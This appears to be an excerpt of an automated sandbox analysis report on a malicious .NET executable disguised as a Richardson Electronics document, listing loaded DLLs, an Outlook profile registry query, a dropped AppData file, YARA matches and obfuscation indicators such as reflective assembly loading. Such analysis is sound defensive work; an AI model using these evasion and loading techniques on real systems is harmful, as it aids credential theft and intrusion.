                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003D49000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.000000000303D000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202771883.00000000062B0000.00000004.08000000.00040000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2327778523.0000000002739000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2362069803.0000000003547000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2449682974.0000000003847000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2416647323.00000000029D7000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003D49000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.000000000303D000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202771883.00000000062B0000.00000004.08000000.00040000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2327778523.0000000002739000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2362069803.0000000003547000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2449682974.0000000003847000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2416647323.00000000029D7000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, chTFiqmX7e7ryBTtveH.cs.Net Code: Type.GetTypeFromHandle(SHSWVArpMhbIMpKZQ9D.nosvkMpphr(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(SHSWVArpMhbIMpKZQ9D.nosvkMpphr(16777259)),Type.GetTypeFromHandle(SHSWVArpMhbIMpKZQ9D.nosvkMpphr(16777263))})
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, Evtxjrbk.cs.Net Code: LoadAssembly System.Reflection.Assembly.Load(byte[])
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, Qfwdks.cs.Net Code: Cuqrwcwcabq
                        Source: Eggdjjrhey.exe.0.dr, Evtxjrbk.cs.Net Code: LoadAssembly System.Reflection.Assembly.Load(byte[])
                        Source: Eggdjjrhey.exe.0.dr, Qfwdks.cs.Net Code: Cuqrwcwcabq
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.474ede0.8.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.474ede0.8.raw.unpack, ListDecorator.cs.Net Code: Read
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.474ede0.8.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.474ede0.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.474ede0.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d99570.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d99570.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d99570.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d49550.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d49550.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d49550.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                        Source: Yara matchFile source: 8.2.Eggdjjrhey.exe.40d1180.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.6170000.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.Eggdjjrhey.exe.3dd1180.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.4671180.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.2416647323.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2449682974.00000000040D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2177833444.0000000002D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2202112593.0000000006170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2362069803.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2327778523.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Richardson Electronics, LTD. PRD10221301UUE.exe PID: 2896, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Eggdjjrhey.exe PID: 936, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Eggdjjrhey.exe PID: 7152, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060BD296 push es; iretd 0_2_060BD2CC
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060B9F15 push cs; retf 0_2_060B9F16
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060B8F63 pushad ; ret 0_2_060B8FF9
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060B8499 push esp; ret 0_2_060B84A5
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060BAD59 pushad ; ret 0_2_060BAD65
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060D2C4E push es; ret 0_2_060D2C64
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060DC142 push es; ret 0_2_060DC1F0
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060F1F47 push es; iretd 0_2_060F2000
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060F2073 push es; iretd 0_2_060F212C
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060F20F3 push es; iretd 0_2_060F212C
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060F212D push es; iretd 0_2_060F2138
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_065131F7 push cs; iretd 0_2_065131F8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_02330375 pushfd ; ret 3_2_02330401
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_059D2EA7 push esp; retf 3_2_059D2EA8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_059EDF9D push esp; ret 3_2_059EDFA1
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A38FF5 pushad ; ret 3_2_05A38FF9
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A39F15 push cs; retf 3_2_05A39F16
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05E931F7 push cs; iretd 3_2_05E931F8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05AC2EA7 push esp; retf 8_2_05AC2EA8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B28499 push esp; ret 8_2_05B284A5
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B28FF5 pushad ; ret 8_2_05B28FF9
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B29F15 push cs; retf 8_2_05B29F16
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05F831F7 push cs; iretd 8_2_05F831F8
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.5f10000.10.raw.unpack, VrrLi8qNmMxuWnu3hJ3.csHigh entropy of concatenated method names: 'MvsqlyCVSD', 'zseLtLF4wXjnYGS7A59', 'vH5DIMFS2Ult1QFsChe', 'geIg1MFycQAsgdkeMR3', 'eXL1pVF3HaSNA5mGsFo', 'ivE3ClFTRQ075xbi8Pi', 'OhmvOhFvlTUfMqRwJTb', 'UkpxOOFAQNprepksP54'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.5f10000.10.raw.unpack, gBtcIR8RcjgM3DoqN8n.csHigh entropy of concatenated method names: 'KhU8hZchsL', 'yqC3krXQxcEcW5keFOE', 'N8GSWGXGSTG4IWr4HdK', 'My0HEiXZOSmK2JyBdMk', 'qJbgenX5HhlpZZHdwr1', 'GLHUsUXvLLqk1Pi2Zl1', 'uRCTF1XAqfwaRTF7pMu'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.5f10000.10.raw.unpack, pjfYpZqcSIBDon0A8DL.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'wF8qOJrkor', 'NtProtectVirtualMemory', 'nBZZeDF9eS4QjHVmJpm', 'PdlGX6FgJ2ng33FvkP6', 'PLx0gYFs8xx8Kb6KP53', 'LK2l2vFlsQkHkD8E7O8'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, heqkNqwlCACulDbN3p3.csHigh entropy of concatenated method names: 'VBSw0m08RD', 'KLuwkKJKWH', 'bDjwgdX2Od', 'Bkqw1RkQwG', 'f9SGdclofkyU2eDytKw', 'n1YWJSlB6SB8sVydZYy', 'hmDo8IleahDr6T83PuE', 'cjJj1xl0RD65lh7owfD', 'xtPx97lky8CUIXMNuw3', 'j6MEdClCsOKnsnUtQUT'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'PixvAygvA7m41KAf5yJ'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, KwrHxD8pkmnaxCCr3Jh.csHigh entropy of concatenated method names: 'Tf58aIim26', 'AOo8f5pQiD', 'yik8XDBs2N', 'cuY8jQeeO7', 'bY68FbsEIg', 'f50ci0XSYHeELwT9ZVQ', 'K7a08DXyZrtZencBnRO', 'hc2nKOXii9TaXP8mU2O', 'yDB1TrXbKIcI5e52DMF', 'nC1QojX7CNpSWsN6aNW'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, updkuA8sC2UZns1Ju8h.csHigh entropy of concatenated method names: 'wPL89SuqBs', 'um18gFGRMm', 'YJF81yxHY2', 'cH3AxbjssaQDnh1u680', 'GMEbaVjlxkJjgtSn4xf', 'eNrKakj9l9iWLF7Dpii', 'RiYf5ujgsFf0b4a8uPy', 'lcwBFejjj7uNPcy22i6', 'zQKiMgjF925VN4aM6IZ', 'QoRTDKj1XPUV7mA3PPd'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, hhQOFgmJo0AVOZ47Kvp.csHigh entropy of concatenated method names: 'AxEmPGKoWU', 'dDdKElgYpjWQiARIrQJ', 'PItY0Qgt3AGekSZfkxw', 'denAiKgVpTKFoDMjShU', 'Gjk2j1g8BZg0xynaayX', 'YN672pgq9yueerhhT6i', 'XsYSkkgIpapWXJGLCXD', 'S5RvMNgUsYfsdEtVqbU', 'ViUXqagwjkB9SBUN1C5', 'ScRQicgmJ71P3t68TBM'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, GnryndwZZGbsDI7FinL.csHigh entropy of concatenated method names: 'fG3w3jj64U', 'm4FLCa9qq2c7X2gG7uk', 'MoRfL49IVpSPX6iJutE', 'f4H2G09UbJYAlHCQnXJ', 'fx3tBe9w4XNuFDp1VtS', 'zv1VKK9mfx23KFfnlUd', 'yO2Kj69nyd2iWg4WeMk', 'psN4Ig9VuMUPhAyuFlI', 'u3rfwF98bmRrSXAFmUW'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, DbiVHCwTMpnNHCI9yqF.csHigh entropy of concatenated method names: 'raHwSMvlRG', 'eNuwiyhbiC', 'ObAwygoG78', 'zjRkIC9L87gWIIeLlpB', 'ye87hI9dYiKsZCc6Xyx', 'stvB1R9J2Kdubs83XKQ', 'cUiGIl9P30NEKqQdchH', 'MsqLEW92TUWgwmviv2m', 'RjxeMp9WV1kwSp4yf0w'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, TRBc3ddCa5DCEp0DmL.csHigh entropy of concatenated method names: 'sImP0KK1f', 'oQs2oJI5F', 'neMcxUykv', 'TR1Hh83oO', 'kekLqZUwo', 'stiYUgaZ54iWyxywew9', 'tfcqMWa5DDcXBGfBkD0', 'JGCCRHa31ZbYfxgHLAo', 'hicm2CaTehE4vd2o2CV', 'dB3Utsa4vE3f7XULWmc'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, lBsNcDwu5L8LBIpUQ9t.csHigh entropy of concatenated method names: 'kP0wpVQ95R', 'RGBZr4s6f3ERsIH2wQ5', 'HybkgysE9Y8MglAoaCJ', 'TX37LxszVlWi07dhnCW', 'rwkUbYlKGEGdZe6BTBQ', 'lckqQys7t0VP6pOZP92', 'yUDIlpsDTDx8aVA3V9T'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, eRyrb2uMR8r6A8nWGy.csHigh entropy of concatenated method names: 'd6epyMr0M', 'UikNoc7pj', 'WgYfi19Nk', 'vO8abBJCB', 'FulPI6abCuVSCunauab', 'iOXh5ma70O2HXsOsb74', 'za3fCfaD4QobTBZtiYC', 'K3j8wsa6SDh5THnsGJf', 'ohpimIaE11UL9WZl5p0', 'HYmffvaznMZEr26sI9P'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, VrrLi8qNmMxuWnu3hJ3.csHigh entropy of concatenated method names: 'MvsqlyCVSD', 'zseLtLF4wXjnYGS7A59', 'vH5DIMFS2Ult1QFsChe', 'geIg1MFycQAsgdkeMR3', 'eXL1pVF3HaSNA5mGsFo', 'ivE3ClFTRQ075xbi8Pi', 'OhmvOhFvlTUfMqRwJTb', 'UkpxOOFAQNprepksP54'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, gBtcIR8RcjgM3DoqN8n.csHigh entropy of concatenated method names: 'KhU8hZchsL', 'yqC3krXQxcEcW5keFOE', 'N8GSWGXGSTG4IWr4HdK', 'My0HEiXZOSmK2JyBdMk', 'qJbgenX5HhlpZZHdwr1', 'GLHUsUXvLLqk1Pi2Zl1', 'uRCTF1XAqfwaRTF7pMu'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, lrNxUhrjMFMbZMAZyLr.csHigh entropy of concatenated method names: 'jiQrCTlsXi', 'GHUrvaKMZK', 'tBFrAUhqUV', 'K9srQtpMt8', 'cGZrG5kgg1', 'gbXrZFcoDE', 'Do4r5P155E', 'z0Br3LCb3Y', 'AxYrTZ3Vpx', 'nhYr4lumfc'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, TFsuXEwedua0Zs6ue3S.csHigh entropy of concatenated method names: 'cscwv1GwS9', 'S5sjenl5DvJcD0iGX59', 'XOcomjl38bs8Zk69D2Q', 'xaWF3nlTD9TVoqMgkrR', 'nhXrpal4gMQTbJ26Yl0', 'yoqCvHlSY59pVSvGpGr', 'EHFYDVlyXg6UH95aZwS', 'xLgYAEliRuklB2AWJxL', 'bW9hmklbuyeAJvHZBME', 'bKTHKBl7TVc93BBjXt5'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, chTFiqmX7e7ryBTtveH.csHigh entropy of concatenated method names: 'LYmFP41xlpo0hNNVZKf', 'R7MRXI1RWCOnvotFFZ2', 'qj3rVBAkl2', 'oJaRbB1NyJyfo3jm1LL', 'M82O471aNjpKmaQWeTl', 'LwLfWP1fPrM5ud6Vd3x', 'UptQY81X8GLmP5BDrl1', 'JIWFvK1jg4Ypj6tItCf', 'vo6oHt1FlV2Rt8ExsKL', 'G67JLk1sNPEjmy7JFln'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, NJ7wh3mma5HZkZWpByp.csHigh entropy of concatenated method names: 'iZ9mrD1shM', 'Rnimdyi8CZ', 'CEHdt59BTopQ9cPo30c', 'aue37f9eVYaG0b3aBaB', 'PB5dQr9CvLBWIYTbjda', 'WqB1Cw9kDy9TDguj4s8', 'oEvI7B9oDmeNOYdSjvg', 'NnYwm89vTGDZFEbD53e', 'xle71D9ADnB3dBqt0r0', 'dwhv2e9QgGl4GahJhmq'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, qYVYxywjI8IFriOuxfs.csHigh entropy of concatenated method names: 'AF4wsN5wdU', 'tMGgTGlFPPa7cEsZ7Xn', 'X3MX5dls333Z8jQM9FP', 'IwuXO0ll2FHC8FmTCyh', 'ipco2ml9rbpHHvsgVRr', 'yaBm2flgHVOuauFSGBP', 'FdAevXlXk9W3uhhVuiM', 'sJJFDGljS2Q342J864d'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, pjfYpZqcSIBDon0A8DL.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'wF8qOJrkor', 'NtProtectVirtualMemory', 'nBZZeDF9eS4QjHVmJpm', 'PdlGX6FgJ2ng33FvkP6', 'PLx0gYFs8xx8Kb6KP53', 'LK2l2vFlsQkHkD8E7O8'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, CAPgMKwNAycR4TecKa7.csHigh entropy of concatenated method names: 'mAgwfFZn3o', 'i4JwX8BS9G', 'qvZn7IlYJmIxnyXNgPl', 'mNl30Hlt7a1VuhgXN5p', 'grdQxRlVlbetyAVCdMc', 'lVY3Bql8elcASphf8ID', 'xoe85rlqrEPp3o74cse', 'aInTIYlIctOHhys1utB', 'SdTeoYlUcAnx8xZqAVY', 'vmAL8UlwpgJtJywnRgG'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, CkVlbirSXM6AQp3rRa7.csHigh entropy of concatenated method names: 'fAqcW0KoYh', 'URAccbmNFA', 'h9bcH0bOUm', 'SM8cOWbhqc', 'jMTcxZ9qRS', 'CmLcRJdHKw', 't7ccuj5unf', 'MkQd2CBPp5', 'yrmchL0T1Z', 'oMAcpi8X74'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, x54erRm25yvmswt7S15.csHigh entropy of concatenated method names: 'liEmcvZB29', 'mPgmHxjUht', 'Jt9iYfgL6kYwp0ZZrx4', 'c25mSNgP3yWWbmsqcWR', 'fag2ZWg2dTonGtu1Z6S', 'xyUyqngdMcrUZZWAk5c', 'mDqSA7gJVCtYePDQTKf', 'aRPy41gWVEaSOm9je6m', 'S9gqQKgcJLHdvXseSHW', 'RbupwbgHD6AEWbcLy9i'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, H1OubCYWg6yp8vlyifr.csHigh entropy of concatenated method names: 'yUvYHxicFk', 'l4CXX2fXZxwVZDWkMGm', 'lUJd9afj32kuAm1wwIL', 'qqhjj2fFbCtRPivFJaC', 'AUQPudfsyDOrrgP1RpG', 'S4HxDBfl2oGETjRUSV2', 'UyrK1Yf9306yIjkCYwg', 'CieebFfgeHG5U9UndRm', 'gy7N4jf1JvsfGw5cx0W', 'PnA0eff0bZrkBGyyqpQ'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.44a2610.2.raw.unpack, a6ighGqMD3hYU58ep8h.csHigh entropy of concatenated method names: 'DiSqtYxU0U', 'e3Eq88W0qk', 'LkcqIl4iRK', 'WH2qw7y6Xl', 'lO3qm6DKJO', 'Lauqnkhppy', 'gC2qrQyqGR', 'T9nqds1fQB', 'Q4jqJ2c2Sm', 'LE7qLL8NTI'
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeFile created: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeJump to dropped file
